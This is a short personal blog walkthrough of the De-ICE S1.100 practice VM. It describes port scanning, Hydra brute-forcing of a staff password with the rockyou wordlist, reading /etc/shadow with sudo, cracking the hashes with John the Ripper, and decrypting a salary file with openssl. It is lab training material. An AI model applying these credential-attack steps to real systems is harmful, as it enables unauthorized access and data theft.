Stepping through De-ICE S1.100

I’ve been running through a bunch of vulnerable VM’s recently and wanted to document some of my progress so far.  Here’s how I stepped through De-ICE S1.100 which you can get here from Vulnhub.

Ran nmap -sS -sV 192.168.50.101 –open –reason

1

 

 

Ran Nessus against 192.168.50.101

 

2

 

Looked up CVE’s on PHP 5.1.x (but lead no where)

 

Looked at webpage and put names of IT staff in a txt file

3

 

Grabbed the rockyou.txt file, ran Hydra and got the password for aadams

4

 

Logged in as aadams

5

 

Ran cat /etc/passwd and cat/etc/shadow but it gave me permission denied on shadow file, so I did sudo cat/etc/shadow and entered his password and got the results

6

7

 

I then tried running the hashes through some online hash checkers, but I couldn’t find one that worked, so I looked up some other options, and John the ripper came up.. of course! (duh).  I then copied the hashes into a txt file called hashes.txt (but forgot root…oops!) and ran John with the rockyou wordlist

8

9

1011

 

I then started looking around and found an ftp directory with a file named salary_dec2003.vsc.enc.  I looked up what enc files were and how to open them (after trying some other stupid things) and found openssl, which was on the computer.  I ran it with the example I found, but it didn’t work.  so I looked at the help file, saw I could try other encryption types, tried the first one in the list and was able to open the file!  It was crazy large though, so I then looked up how view it better and learned of the less command.

12

 

Success!

13